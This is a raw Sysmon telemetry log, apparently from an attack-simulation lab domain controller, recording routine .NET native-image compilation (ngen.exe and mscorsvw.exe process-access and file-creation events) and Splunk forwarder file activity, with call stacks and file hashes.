21:07:05.996{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-8705-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023195Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.964{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-8705-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023194Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:05.964{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-8705-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023193Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.964{4DB9351A-A279-60D3-8605-00000000CF01}6984NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5TNA1AQ1C4\Microsoft.Windows.FileServer.Management.Common.ni.dll.auxMD5=3DD5A6D170D64DB19ECA50A74DBDE002,SHA256=D1C851CD18507312AB2FD14D1C1D1A88D5B8821E8C8A76CAD08D8187BD3665C2,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023192Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.964{4DB9351A-A279-60D3-8605-00000000CF01}6984NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5TNA1AQ1C4\Microsoft.Windows.FileServer.Management.Common.ni.dllMD5=CE975114FE64C5922A09253F1E76FE02,SHA256=D2781489B62B2595B9DEB7EECE21171B1EBEF5E554C3B270017F9F696B9B11DA,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023191Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.949{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-8605-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023190Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.917{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-8605-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023189Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:05.917{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-8605-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023188Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.917{4DB9351A-A279-60D3-8505-00000000CF01}2636NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\B9CTZC9G1H\Microsoft.Windows.DSC.CoreConfProviders.ni.dll.auxMD5=EED043638B1501762383D70467223FB4,SHA256=4BE50FE5F93CAC62F553F3212C617C949522299124CB5B3332F1752E61458521,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023187Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.917{4DB9351A-A279-60D3-8505-00000000CF01}2636NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\B9CTZC9G1H\Microsoft.Windows.DSC.CoreConfProviders.ni.dllMD5=639DC5A63D7C8B6654D4FB8EEF9AFB33,SHA256=7885BFA8080848E2FAB301B22580CD6A1ECAF7D0AD04462E8840C5A1ED837E7C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023186Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.902{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB08BD93C16FD5274298D5AC312CAF9C,SHA256=375D8FCA231EC75AA800535D976E6F337D68855D88D53179EAE25A22DD4C0AD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023185Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.886{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02E128E6D01B7C298489315DF57D2241,SHA256=C5526A8FFD5282C9A2F83C0ADD4C8B81A47412B49B8BA8705A75976D93E5D065,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023184Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.871{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C25708CF0C5CCEB0EB7D1581DCAE48C,SHA256=216185BC6EC5541ACA0EBA3D5D9F4317FB67CC799736523C0700B48C49D3F7B1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023183Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.808{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-8505-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023182Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.777{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-8505-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023181Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:05.777{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-8505-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023180Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.777{4DB9351A-A279-60D3-8405-00000000CF01}6504NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5B24G40NYB\Microsoft.Windows.Dns.ni.dll.auxMD5=575836F3C94E048A75F253E6DF6013C4,SHA256=E82813A648CD89758F946BF1B98D6E86AA21E0ADB2ADD1777F65F6CAFF74FD7A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023179Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.777{4DB9351A-A279-60D3-8405-00000000CF01}6504NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5B24G40NYB\Microsoft.Windows.Dns.ni.dllMD5=AAD18A16B38E4B977C13D3C4202F5ACE,SHA256=F6D958906E3A451A84B1C2C94D3EDCD034D67D7EC238B8FFB739407FE564E8F3,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023178Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.761{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-8405-00000000CF01}6504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023177Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.746{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-8405-00000000CF01}6504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023176Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:05.746{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-8405-00000000CF01}6504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023175Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.746{4DB9351A-A279-60D3-8305-00000000CF01}5712NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LYRTDFXALT\Microsoft.Windows.Diagnosis.TroubleshootingPack.ni.dll.auxMD5=83C3AEF2694E7A532E543ECBBB85BDC4,SHA256=FC7BC5E37F130C787AAC249B7FCE45C8C6F30C45654AA9B9CCD98068DC8DA0F7,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023174Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.730{4DB9351A-A279-60D3-8305-00000000CF01}5712NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LYRTDFXALT\Microsoft.Windows.Diagnosis.TroubleshootingPack.ni.dllMD5=82B953BD78953B5B762C22921ED073CD,SHA256=E6CD136D3E76D9399ACDCB90556D95D75A092A8B557AC6F99DEEFF8DC7181A2A,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023173Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.714{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-8305-00000000CF01}5712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023172Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.714{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-8305-00000000CF01}5712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023171Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:05.714{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-8305-00000000CF01}5712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023170Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.699{4DB9351A-A279-60D3-8205-00000000CF01}2632NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VUACNGCW3V\Microsoft.Windows.Diagnosis.SDHost.ni.dll.auxMD5=54E620C739DDC7A6F80C83BDA3928C02,SHA256=7F0FF8EE91A1F53A5C97A8B382F686D95F26739CFD28210329C45647B85A01C8,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023169Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.699{4DB9351A-A279-60D3-8205-00000000CF01}2632NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VUACNGCW3V\Microsoft.Windows.Diagnosis.SDHost.ni.dllMD5=53CE2E8B7210AE5D9C321B4861183C60,SHA256=99E91D74556BA62CB179DAC1A9D9A028FBEF8AA5479AD4D918E2B8F8CFAB3D35,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023168Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.683{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-8205-00000000CF01}2632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023167Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.683{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-8205-00000000CF01}2632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023166Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
(tail of the preceding ProcessAccess record, whose header is above this section) UtcTime=(date above) 21:07:05.683; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=5396; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A279-60D3-8205-00000000CF01}; TargetProcessId=2632; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; 